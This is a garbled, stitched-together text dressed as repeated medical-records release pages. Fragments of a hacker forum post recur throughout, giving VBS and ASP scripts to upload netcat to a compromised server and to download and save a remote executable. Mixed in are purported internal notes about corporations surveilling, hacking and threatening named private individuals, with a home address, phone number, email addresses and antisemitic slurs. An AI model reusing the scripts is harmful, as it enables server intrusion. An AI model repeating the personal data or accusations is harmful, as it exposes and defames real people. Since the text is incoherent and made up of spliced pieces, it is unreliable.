
in         your         client,save        as         up.vbs:

with                                                          wscript
if              .arguments.count<3          then             .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                              with
with                             createobject("adodb.stream")
.type=1:.open:.loadfromfabout all ways to upload files to cmd shell ,
```

8787030

2073984700

OC  FL Document ID (AC-2)

--que: 1981 / 07894.
Medical Records Release Authorization
1495    A    INN1
1497    A    IJC1
1499    A    IJC1
1501    A    IJC1
1503    A    IJC1

## CHRON (REVIEW 4 OF 4)
Password required to print.

since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want    including    signs    and    all;GOTOP&5294    @echo    ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end        with%^>        >up.asp

in          your          client,save          as      .      up.vbs:

with              ."            wscript
if              .arguments.count<3              then              .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                                  with
with                              createobject("adodb.stream")
.type=1:.open:.loadfromf

Return to server G-2
Mem/dwnload473Kb/s:
Phone server co-source Digital Messaging System KX2621nkST

E-9
ESS systempurgeremnan52512GOTOinclude client/clmt emails/diskettes-CD-
audio -nc whereapplic^%$#@GOTOresetE-9refuse-garbageaurveillance-
CT/MI/WV/VA/DE-INT/TRVCHECKGOTO(*$#126.Emailcrawler/film and 3-
Dwhereapplicable/mail
toUCONNadd392infile.22562706$$&)(($@CARRIAGERESET736
E-9
E-9
E-9RESET93632523p
Westlaw-Lexis  printout  letterheads  and  redletterconfidential  per
password**********************passwordrequiredtoprint
passwordrequiredtoprint                     passwordrequiredtoprint
passwordrequiredtoreset4aPorto read full Mary Thomas file, where she
was very angry about what Corning did. Was a big mistake for Corning
detective to send the prank prison letters to BASF, Harlan, and the
others. Went too far.  Mary was scared that the ESS has gone from
being a bona fide Epidemiology Surveillance System to a Big-Brother
"Employee Surveillance System" instead, especially tampering with the
mail.  Can't beleve Greg Bond would allow it, and then have the balls
to write some article, or least approve it, about Dow's epidemiology
system using mail for info base after what Mary said. Crossed the
line.  Somebody might catch on. Better be more careful. Mary even saw
the letter halves we got from Freland, MI, or from wherever it was Orr
lived after Gerald Court.  Jackie Kelyman too upset to talk about it,
and was probably glad to be in Canada where at least both she and
Orr's Corning notebooks citing the fraud were over the border.  Going
through Orr's trash is no better, but at least it's legal.  Porto has

8787031

2073984700

DC  PL Document ID (AC-3)

CHRON (REVIEW 4 OF 4)
Password required to print. ··············

since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP&5294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end    with%^>    >up.asp

in           your          client,save         as       ·    up.vbs:

with                                                          wscript
if             .arguments.count<3            then            .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                            with
with                            createobject("adodb.stream")
.type=1:.open:.loadfromf              ·

Return to server G-2
Mem/dwnload473Kb/s:
Phone server co-source Digital Messaging System KX2621nkST

E-9
ESS systempurgeremnan52512GOTOinclude client/clmt emails/diskettes-CD-
audio -nc whereapplic^%$#@GOTOresetE-9refuse-garbageaurveillance-
CT/MI/WV/VA/DE-INT/TRVCHECKGOTO(*$#126.Emailcrawler/film and 3-
Dwhereapplicable/mail
toUCONNadd392infile.2256270&$$&)((S@CARRIAGERESET736
E-9
E-9
E-9RESET93632523p
Westlaw-Lexis printout letterheads and redletterconfidential per
password·······················passwordrequiredtoprint
passwordrequiredtoprint              passwordrequiredtoprint
passwordrequiredtoreset4aPorto read full Mary Thomas file, where she
was very angry about what Corning did. Was a big mistake for Corning
detective to send the prank prison letters to BASF, Harlan, and the
others. Went too far.  Mary was scared that the ESS has gone from
being a bona fide Epidemiology Surveillance System to a Big-Brother
"Employee Surveillance System" instead, especially tampering with the
mail.  Can't beleve Greg Bond would allow it, and then have the balls
to write some article, or least approve it, about Dow's epidemiology
system using mail for info base after what Mary said. Crossed the
line.  Somebody might catch on. Better be more careful. Mary even saw
the letter halves we got from Freland, MI, or from wherever it was Orr
lived after Gerald Court. Jackie Kelyman too upset to talk about it,
and was probably glad to be in Canada where at least both she and
Orr's Corning notebooks citing the fraud were over the border.  Going
through Orr's trash is no better, but at least it's legal.  Porto has

8787031

2073984700

DC   FL Document ID (AC-1)

Request 1581 / 07896.
Medical Records Release Authorization
1491     A     (NM)
1491     A     (JC)
1411     A     (JC)
1292     A     (JC)
1782     A     (JC)

CHRON (REVIEW 4 OF 4)
Password required to print. ············

Focus Center

Focus Center

Focus Center

2073984700

DC PL Document ID (AC-2)

HLQUEST (TEL / 07896+
Medical Record Release Authorization
.I9I      A       (PAA)
.I9?      A       (JC)
.II9      A       (JC)
.II?I     A       (JC)
.II9I     A       (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print ···········

seen nearly all of the films by now and is asking for more money.
Approve for > $10,000 transf. without second routing signature OK,
otherwise he was joking about sending the films to either Cannon or
UCONN, but discontinue E-Gold to CT garbage company immediately. Greg
Bond wants out, and he wants Porto out, too. He intends to re-code
the ESS and the E-Gold tr472 files and plans to re-sequester the
Sarnia database. Dorinco is also a problem. Not counting Horgen,
there are over 7.4 million Sarnia pages filed on 078986/07896, with
800,000 direct, and the remainder cross-references, but this is real
small compared with the condurrent Dorinco and SBI databases. Even the
Visa/Amex records for Sweet Onion and Holiday Inn are there, you name
it, and either Porto or his sidekick has seen it.   All the pages
Bertie Butts took out of the personnel file transferred to Sarnia. By
the way, did Bertie ever get anybody to post-sign that unsigned
performance appraisal on Orr?  May be a minor point but if he wants to
collect signatures, he better do it before they die, either that or he
can do a signature cut-and-paste if push comes to shove.  Is the boss
for that one still around? GOTO2612vPorto's computer buddy saw the
2982RC files, so had to call his hand and tell him Dow won't agree to
anymore e-gold trans if he doesn't straighten up. John Magee and Eugen
Driker not too happy with Porto in part, and neither was Starck. Porto
called up one night rambling about that he saw in the 00-10331-BC/Judge
John Lawson file. Brink and Magee's buddies joking in emails about "all
those favors for Lawson finally paid off, and we got that 140-page
ruling."   "Watch out," said Porto, somebody at the next level might not
know Dow, and besides some of these files might make it out the door."
That's when we had to remind him of the e-gold arranb he himself has
asked for. Paul Brink has been especially concerned about Porto lately,
so maybe would be best to look for a replacement if it weren't for Katz
being at Griffin. The second Griffin doctor angle fell through again, so
Brink said keep Porto. CITICORP BIG JOHN copied emails from Brink
need to be purged from the cache and from any of the auto-resave banks,
because Porto or somebody forwarded them to Dorinco secretary, SEBA,
Stan, and god knows who else by mistake, or maybe it was on purpose.
"Really pulled the wool over their eyes, didn't we, the IRS the EBSA, and
Dennis Donohue lost good." Bette Briggs' letter to Brink, the Corning pdf
version with margin notes, was re-cached and resent, too, and more than
once, so we have a real prob. Maybe worse than the Corning notebboks, so
we need to do something about 95698-93698y123 SETg E-95698y123 SETg E-
95698y123 SETg E-95698y123 SETg E-95698y123 SETg E-95698y123 SETg E-
95698y123 SETg E-95698y123 SETh Interlocking Dorinco and MetLife
arrangements don't help, either.  One of the emails had a lot about John
Ryan of MetLife in it, too, and he wasn't too pleased. It was probably a
mistake to ever let Porto into the cached files.  Downloaded DC429A
emails and the cache, too, and then emailed to CT locations, Ryan had
his name in there so many times it wasn't funny, and it's just the
opposite of what he testified about. Have to fix this.  The cached emails
and log notes refute his testimony. Even the court itself used the word
"sham"nearly 100 times in the 140-pager, DC may have pulled the wool over
at the dist level, but won't be so easy next time around.  The biggest
problem is the other cases mentioned in the cache, thgough, and they are
worth a thousand times more than the COLIs and the ERISA and IRS-

8787032

2073984700

DC PL Document ID (AC-2).

```
=-1-.-1  1981 / 07806-
=-1-.-1  Access Release Authorization
  .1:1    A    1nA1
  ;1:1    A    1JC1
  .1:1    A    1JC1
  ::::    A    1JC1
  ::::.   A    1JC1
```

## CHRON (REVIEW 4 OF 4)
Password required to print ............

seen nearly all of the films by now and is asking for more money.
Approve for > $10,000 transf. without second routing signature OK,
otherwise he was joking about sending the films to either Cannon or
UCONN, but discontinue E-Gold to CT garbage company immediately. Greg
Bond wants out, and he wants Porto out, too. He intends to re-code
the ESS and the E-Gold tr472 files and plans to re-sequester the
Sarnia database. Dorinco is also a problem. Not counting Horgen,
there are over 7.4 million Sarnia pages, filed on 078986/078986, with
800,000 direct, and the remainder cross-references, but this is real
small compared with the condurrent Dorindo and SBI databases. Even the
Visa/Amex records for Sweet Onion and Holiday Inn are there, you name
it, and either Porto or his sidekick has seen it. All the pages
Bertie Butts took out of the personnel file transferred to Sarnia. By
the way, did Bertie ever get anybody to post-sign that unsigned
performance appraisal on Orr? May be a minor point but if he wants to
collect signatures, he better do it before they die, either that or he
can do a signature cut-and-paste if push comes to shove. Is the boss
for that one still around? GOTO2612VPPorto's computer buddy saw the
2982RC files, so had to call his hand and tell him Dow won't agree to
anymore e-gold trans if he doesn't straighten up. John Magee and Eugen
Driker not too happy with Porto in past, and neither was Stark. Porto
called up one night rambling about what he saw in the 00-10331-BC/Judge
John Lawson file. Brink and Magee's buddies joking in emails about "all
those favors for Lawson finally paid off, and we got that 140-page
ruling." "Watch out," said Porto, somebody at the next level might not
know Dow, and besides some of these files might make it out the door."
That's when we had to remind him of the e-gold arrang he himself has
asked for. Paul Brink has been especially concerned about Porto lately,
so maybe would be best to look for a replacement if it weren't for Katz
being at Griffin. The second Griffin doctor angle fell through again, so
Brink said keep Porto. E-91720GOTO Eighteen forwarded emails from Brink
need to be purged from the cache and from any of the auto-resaave banks,
because Porto or somebody forwarded them to Dorinco secretary, SEBA,
Stan, and god knows who else by mistake, or maybe it was on purpose.
"Really pulled the wool over their eyes, didn't we, the IRS the EBSA,, and
Dennis Donohue lost good." Bette Briggs' letter to Brink, the Corning pdf
version with margin notes, was re-cached and resent, too, and more than
once, so we have a real prob. Maybe worse than the Corning notebboks, so
we need to do something about it. E-95698y123 SETg E-95698y123 SETg E-
95698y123 SETg E-95698y123 SETg E-95698y123 SETg E-95698y12B SETg E-
95698y123 SETg E-95698y123 SETh Interlocking Dorinco and MetLife
arrangements don't help, either. One of the emails had a lot about John
Ryan of MetLife in it, too, and he wasn't too pleased. It was probably a
mistake to ever let Porto into the cached files. Downloaded DC429A
emails and the cache, too, and then emailed to CT locations. Ryan had
his name in there so many times it wasn't funny, and it's just the
opposite of what he testified about. Have to fix this. The cached emails
and log notes refute his testimony. Even the court itself used the word
"sham"nearly 100 times in the 140-pager, DC may have pulled the wool over
at the dist level, but won't be so easy next time around. The biggest
problem is the other cases mentioned in the cache, thgough, and they are
worth a thousand times more than the COLIs and the ERISA and IRS-

8787032

2073984700

DC  FL Document ID [AC-1]

August 1981 / 07836-
Medical Records Release Authorization
:195    A    (NN)
:113    A    (JC)
:135    A    (JC)
::01    A    (JC)
:791    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. ...........

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek

Secr. repo dictated, sig on f1, rec. signed copy, per ds.secretary
Reset363

E-9
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT  06437  RNGenSETTO989356  RNGenSETTO989356  RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

per2982downld826 per2982downld826 per2982downld826 Porto will not agree
to continue additional contract audio surveillance of 145 Greystone per
cellular  scanner,  ctr said 800/900 MHz cellular telephone or any
cordless telephone allows both sides of the conversation per rew/013
Cellular    Telephone    Scanner/Model    AU    013/SR904762cache3aGOTO

3791421

2073984700

DC FL Document ID (AC-2)

Law at 1701 / 07991.
Medical Records Release Authorization
:1)1    A    (NN)
:1)7    A    (JC)
:1)9    A    (JC)
1:0:    A    (JC)
1:0)    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

Also per Telemonitor 3000 for audio on premises via regular telephone
lines, as long as ID system can be programmed to recognize listener as
the owner of the phone.   Easy to reprogram call-in to recognize any
phone-in as the caller, so worked pretty well June-Aug2004 + Jan2005
and Aug 2005, till .92a dipswitch reroute. Will retain only CT video
for remainder of 2005 and Q1 2006. Porto said no wonder D.Orr unable
to exhaust administrative remedies, called supv again after hrs to
discuss truncation of surv. Reported Jun/Jul 2004 typical day as fl/no
F/U:a.  D.Orr morning wk-up:  3:30 - 3:45 AM/work 6 days regularly,
sometimes all 7
b. After her own brfst, makeup, dress, and wash face 3:45-4:00, then
prep. food + area for husband 4:00 - 4:45 AM
c. Cleansing of feces-soiled clothing of husband, also cleansing of
other special areas, including vomitus from moving husband.
d. Often 8-9 times helping husband with movement when unable to
(before waking up at 3:30 AM)
e. Household chores, manmy related to husband's handicaps, after 4:45
AM
f. Leave house from 5:30 AM to 6:00, sometimes before because of work
schedule doubling, and related.
g. Travel to Simsbury, approx. 31 mi from Southington, about 40 min.
of travel in morning if no traffic pile-up/jam
h. Start work from 6:30 or so, go till 5:00 till 6:00 PM, depending on
demands
i. Travel home, shop at Firzgerald's before on road, then shopping
often on way home, Walmart and related, generally for husband's spec.
needs/ C.R. Dr. Guerrera, et al.
j. Arrive home often 7:30 PM
k. Spec. prep. for husband for meals
l. Evening meal approx 8:00 PM or close to.
m. Help husband with bath, except often takes two-three nights for
full bath, since husband's body cannot take stress of full bath in one
day / 9:00 - 10:30
n. Clean bathtub, and related / 11:00
o. Household chores / of daily variety, not including weekly tasks of
lawn, outside (snow removal if other months of year, etc.) 11:00 -12:00
SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek
p. Recurrent monthly bills and paperwork, not including insurance
generally / 12:00 - 12:45+
q. Own bath/shower: 12:45 - 1:00+
r. Retire to sleep 1:15+
Generally repetitive schedule, and if day off once every two weeks
approx., then errands such as car repairs and other necessaries gen.
consume entire day, nght, with same schedule 3:30AM wakeup, and bed

2073984700

DC  FL Document ID IMC-)!

```
4.0.11 1981 / 07656.
Medical Records Release Authorization
:195   A   (NN)
:157   A   (JC)
-.115  A   (JC)
::01   A   (JC)
:703   A   (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

after midnight. Audio espec picked up on extra hours req. for insurance
matters, inclusive of letter to Tucker, answering questions, and moving
document items, etc. May have hurt herself in moving the boxes.
Repeated surveillance dozens of times since, with recents about 1-7-
2020.

Hao Gu 10-7-15: HG (to TA) Where are you now, Telesforo? Did you get
the prev mess? I have asked Alfred to fix the fl/ln-Eliseo and fl/ln-
page-number repeat issues, too. Pronto. Telesforo, your surveillance on
Amanda Phillips via ADT and Rodan or whatever she's affil with must
stop. Pronto. But all the Facebook/Apple server skimming - via URL
masking and erasing and all those other tricks from Alfred - that you
did on Orr's Facebook account and his Firstenergy contacts and so forth
for years,..from 2010 to today, was real good. It paid off big time. Via
ADT it linked us to the files Orr has on Thomas Macri, so continue
those activities as we discussed at Hamm's restaurant in the Nobelstown
area. Then go ahead and check out taylor Madison. The third-party
servers skimmed the meds and financials on Orr pretty good at least
twice, too, so proceed to next step before Barlow gets back to us if
you can. Either encrypt 2-layer, or use 2-3 proxy addresses/links.
END42
TA (TO HG): OK.
LINK76 HG5523425-cnt-
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437 RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

WP sequestered/Nodoctor-patient relationship exists or is implied by
this report, and no treatment was given or suggested by the
rev/examiner(s).

E-Gold and/or rel. if required,as RJP wishes separation from other
accounts.    Porto    wants    mor    RNGenSETTO989356    RNGenSETTO989356
RNGenSETTO989356    RNGenSETTO989829034ae,    and    re-mentioned    the
groundbreaking NYT article on Dow Chem corp veil with Corning
/completely    non-existent    veil    /counsel    lost    nerve    on
OrrGOTO23926emailcrawler823SETOPortoDC24b pretty quick, excess of
$2+/3+ billion liability, maybe even $10+, could easily pull Dow
Chemical into Chap 11 right along with Corning if he testifies about
Sarnia lab notebooks to Nevada court, or to Pointer, et al, even could
re-surface in future since liability will go for decades on Dow
Chemical's part --- we lost NVcase big, and must make sure
OrrGOTO23926emailcrawler823SETOPortoDC24b does not testify on green
books/lnk --- both the corporate veil case and NYT article came out the
exact   same   week   as   OrrGOTO23926emailcrawler823SETOPortoDC24b's
accident, 11-1-05 versus 10-25-05 accident, within a couple of days.
What's worse, the accident was within hours of Dow's violation of
OrrGOTO23926emailcrawler823SETOPortoDC24b-agreement. Six to seven hours

3791423

2073984700

DC FL Document ID (NC-3)

August 1991 / 07086+
Medical Records Release Authorization
[8]5    A    (NM)
[8]57   X    (JC)
[8]59   X    (JC)
[8]20:  A    (JC)
[8]78:  A    (JC)

## CHRON (REVIEW 4 OF 4)

Password required to print: ···········

after his having been invited back to Dow.  Porto knows he still has us
over   a   barrel   and   even   joked   that   maybe   Dow   bombed
OrrGOTO23926emailcrawler823SETOPortoDC24b's car or sent somebody to do
him in. He's not the only one who's said that, either. Even Sefc. See
notes on Stek, too. Anyhow, Dow broke the 1986/1987agreement big time,
on the very day of the accident, too, and then all of a sudden
OrrGOTO23926emailcrawler824SETOPortoDC24b is disabled, totally, within
hours of being forced to come back on Dow ground in Michigan against
his will.  His worst nightmare, he said, just to have to come to
Midland, he said, and he might want to retaliate.  Told us to never
ever contact him, never call him, nevr contact his employer, never
contact his home, never do anything of the sort, and in spite of all
that, the lab people in 1712 and 2040 wouldn't listen. Sandy
especially. Caused problems with Chuck Colinson, Bob MacMullin, Jeff
Convers, even Zinnert, but especially with the recruiters. And the
Zinc/Silicone thing is a real big problem too since Sefcovic wrote in
the escape clause that keeps Dow on the hook until the end of
OrrGOTO23926emailcrawler823SETOPortoDC24b's life if he's ever disabled.
The green books are the real problem, though, and that ID. Dual DC/DC,
both ways, and the margin notes.  Jakub, too. Talked to Butts, but
won't help now. Set whole chain up. Caused many problems for
OrrGOTO23926emailcrawler823SETOPortoDC24b.      Reset272650hGOTOmargin
error6354nofontma      tch3037ResetE-9     Now     or     later
OrrGOTO23926emailcrawler823SETOPortoDC24b may still decide to break
corporate veil. TEXTrefle25289STOP629Porto has evidently met Dr.
Jackson's fm, yet still seems unfamiliar with transfer rules. Add. qst.
on transfers; requested three sep., as two colleagues assisting UM emp.

Has re-asked for sep. pa7yments.
SETTO092372
SETTO092372
SETTO092372
User   mailbox   exceeds   allowed   size/=28878892084596342414620 9re-
directR7Porto   Stefan   Underhillemailcrawler352%3   stefan   Initial
963424146209re-directR7Porto Stefan Underhillemailcrawler352%3 stefan
Initial        963424146209re-directR7Porto              Stefan
Underhillemailcrawlerresethttp://8-9-
05rtwsibl.od2.com/common/wmp/redirect.aspx?['sghiy=0051445082541519-
9045 35serverredirectA%nGOTOCTRL + click to follow link

GOTO09262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my

3791424

2073984700

DC  FL Document ID (MC-1)

August 1981 / 07396-
Medical Records Release Authorization
1995      A     (NM)
1997      A     (JC)
1999      A     (JC)
2001      A     (JC)
2003      A     (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print **···········**

knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP65294 underline link to file@echo
^<%with server.createobject ("adodb.stream") :.type=1:.open:.write
request.binaryread(request.totalbytes) :.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712apecsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

[message truncated] SETTO92372 Hello,

I can schedule a half hour on Friday, April 1 at 4:30.

-----Original Message-----
From: darlene and ed [SMTP:e.orr@cox.net]
Sent: Monday, March 21, 2005 9:24 AM
To: katie.campochiaro@yalegriffinprc.org
Cc: darlene and ed
Subject: SCHEDULING A FOLLOW-UP APPOINTMENT WITH DR. KATZ

Hi Katie,

In order to keep Dr. Katz fully apprised of any developments with
Edward,

3791425

2073984700

DC  FL Document ID (AC-2)

August 1991 / 070393.
Medical Records Release Authorization
[1195]     X      [NUN]
[1597]     X      [IJC]
[1135]     X      [IJC]
[1201]     X      [IJC]
[1501]     X      [IJC]

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

we would like to schedule a half-hour follow-up appointment with Dr. Katz
at the Integrative Medicine Center as soon as possible.  Are there possibly
any open dates in the next couple of weeks?

Thanks!

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX262lnkbGOTOMem/dwnload473Kb/s:Phone server co-source Digital
Messaging System KX262lnkcGOTOMem/dwnload473Kb/s:Phone server co-
source Digital Messaging System ExtractpdfscanrecenterKX262lnkdST

E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP65294    @echo  ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end   with%^>    >up.asp

in          your          client,save          as          up.vbs:

with                                                           wscript
if              .arguments.count<3              then              .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                            with
with                                    createobject("adodb.stream")
.type=1:.open:.loadfromfile                 fn:s=.read:.close
end                                                            with
with                               createobject("microsoft.xmlhttp")
.open                     "post",url,false:.send                   s
wscript.echo                                             .statustext
end                                                            with

do                                                               it:

3791426

2073984700

DC  PL Document ID (AC-3)

August 1101 / 07696-
Medical Records Release Authorization
1105    1    (KR)
1117    1    (JC)
1115    1    (JC)
1201    1    (JC)
1703    1    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

cscript    up.vbs    http://123.45.67.89/up.asp    nc.exe    mm.exe

2.
start                              its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet                                          Files\Content.IE5"
dir                        /s                          ps[1].exe
copy              XX000XXX\ps[1].exe              c:\path\ps.exe
del                                          XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo  '       set       aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")          >>          dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo        "Error:"+web.status:.quit          >>          dl.vbs
@echo  aso.type=1:aso.open:aso.write  web.responsebody:aso.savetofile
.arguments(1),2:end          with          >>          dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe E-
9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP65294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital

3791427

2073984700

DC FE Document ID (AC-2)

August 1981 / 07896.
Nedital Records Release Authorization
:395   A    (NA)
:399   A    (JC)
:395   A    (JC)
:301   A    (JC)
:701   A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. ···········

infected with a virusL6 and goes everywhere now. By the way, Tom
Waigand was right about that "Stormtrooper Marches" album -- it's good,
and he sent me a copy of Hitler at Home, too. Even better. Tom's got a
problem with spreading himself too thin, though, and delegating his
input to others. Neil Clark and Householder ought to take my advice,
too. I have consistently refused to do the 501 thing, because there is
still a trail, in my opin, so our payments to Clark and HH have been
strictly cash with no account transfers. Waigand with WP was in front
of, or in, Orr's house dozens of times, so we sent both him and Macri
$15,000 for each trip if they got results. Waigand's jimmying the
transformer voltage test results was good on top of it, too. Macri
turned put to be another loose cannon in the end, though. At least he
used trac·fones and disposables like I told him. J. Shea probably does
not have the big picture from the dead Eginton, so we're probably OK
there, in reply to your inquiry about that. Too bad about Lenny
Marshall and his grandson - kept losing him a few years back after
working with Waigand. Lenny, aka Harold at the Church of Christ
Wellsburg, and absentmindedness may get us in trouble. He's been losing
more than kids, and to hear him and his wife talk over and over about
losing a kid over and over sounds stupid. It is stupid. Lenny was
another mistake, but at least he went back to that meter after he
planted the stuff at Orr's, and he helped us get Orr for a few days.
But Jew attorney Winny Winick turned the tables, and there is a video
of Lenny repeatedly going up to that dam meter. Bad. Have to keep Orr
away from the dam JF, because if enough Jew-asses get involved, more
than one table might get overturned for us. So far we've kept the upper
hand in out little group, but a few of our clan have fallen by the
wayside. Tom and I had this IOT concept down pretty good, and were able
to track Orr lots of places. The letter to me at Eaton, though, hits
the Range Resources and West Penn/FirstEnergy nail on the head, though,
and that bothers me - there are multiple FirstEnergy firms we've dealt
with. On top of the Ohio-PA and related FE, there is that other (the
Texas) FE name-knockoff that has worked with Tom Waigand and me and
several others to hack in Jew-ass Orr's systems, and to get the info
for you and Anthony Alexander. Macri's phone losing fiasco had calls to
Alexander and others, and to be honest with you, it's a dam good thing
Macri is gone for good, if you know what I mean. Even so, neither Hamm
nor Orchowski nor the Fire Marshall will come out looking clean if
Alexander's sucky successor group exposes them, what with Chuck Jones
and all the FE money scarfed up by Householder. If it comes to light,
then Hamm goes down, Orchowski and the FM to boot. And any money to
them was maybe a mistake. You were right about Macri's "predilections,"
too -- and he kept on and on laughing and repeating all the dick
comments made by Neil Clark, even called Clark and propositioned him:
"If Clark boy is always talking about dicks, then maybe he and I can
get together and compare more than a few notes one day," said Macri.
Clark was pretty grossed out. After Chuck Jones took Alexander's job in
14/15, both Jones and Alexander gathered up all the File 43r letters -
many certified -- from Orr to FE, and showed them to Householder. Back
in the day, Householder/HH had called me, and we put together plans for
getting the basement documents from 110 Woodridge. Took more than one
trip to get them, but at least we got bitch Orr's Honda good in the

2073984700

DC FL Document ID (AC-3)

```
August 1181 / 07895-
Medical Records Release Authorization
:395    A    (HH)
:397    A    (JC)
